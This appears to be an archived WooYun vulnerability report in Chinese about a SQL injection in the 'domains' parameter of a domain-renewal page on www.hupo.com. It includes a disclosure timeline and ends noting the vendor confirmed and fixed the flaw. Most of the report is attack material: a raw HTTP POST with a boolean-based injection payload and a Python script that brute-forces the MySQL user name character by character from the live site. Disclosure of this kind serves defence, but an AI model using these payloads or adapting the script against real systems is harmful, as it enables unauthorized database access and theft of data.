乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-14: 细节已通知厂商并且等待厂商处理中 2015-08-18: 厂商已经确认,细节仅向厂商公开 2015-08-28: 细节向核心白帽子及相关领域专家公开 2015-09-07: 细节向普通白帽子公开 2015-09-17: 细节向实习白帽子公开 2015-10-02: 细节向公众公开
POST /DO_RenewDomain.php HTTP/1.1Content-Length: 188Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.hupo.com:80/Cookie: PHPSESSID=f9brj2crqtot1s23iiihmgrau3Host: www.hupo.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*submit=&AvailDomains=1&btnAdd=%e6%b7%bb%e5%8a%a0%20>>&btnRemove=<<%20%e7%a7%bb%e9%99%a4&cmd=SelectDomain&domains=-1' OR length(user())=15 or 'x'=' &DomainsList=1&realCmd=RenewDomain&step=3
domains参数为真,user长度为15:
为假:
写个脚本跑跑:
付脚本:
#encoding=utf-8import httplibimport timeimport stringimport sysimport randomimport urllibheaders = {'Content-Type': 'application/x-www-form-urlencoded'}payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')print 'Start to retrive MySQL User:\n'user = ''for i in range(1, 16): for payload in payloads: print '.', conn = httplib.HTTPConnection('www.hupo.com', timeout=60) s = "domains=-1' or ascii(mid(user()from(%s)for(1)))=%s or 'x'='"% (i, ord(payload)) conn.request(method='POST', url='/DO_RenewDomain.php', body='submit=&AvailDomains=1&btnAdd=%e6%b7%bb%e5%8a%a0%20>>&btnRemove=<<%20%e7%a7%bb%e9%99%a4&cmd=SelectDomain&DomainsList=1&realCmd=RenewDomain&step=3&' + s, headers=headers) html_doc = conn.getresponse().read().decode('utf-8') conn.close() #print html_doc if html_doc.find(u'2015-08-29') > 0: user += payload sys.stdout.write('\r[In Progress]' + user) sys.stdout.flush() breakprint '[Done]MySQL user is %s' % user
我看给分一般,就这样吧。。。
危害等级:中
漏洞Rank:5
确认时间:2015-08-18 17:27
漏洞已修复
暂无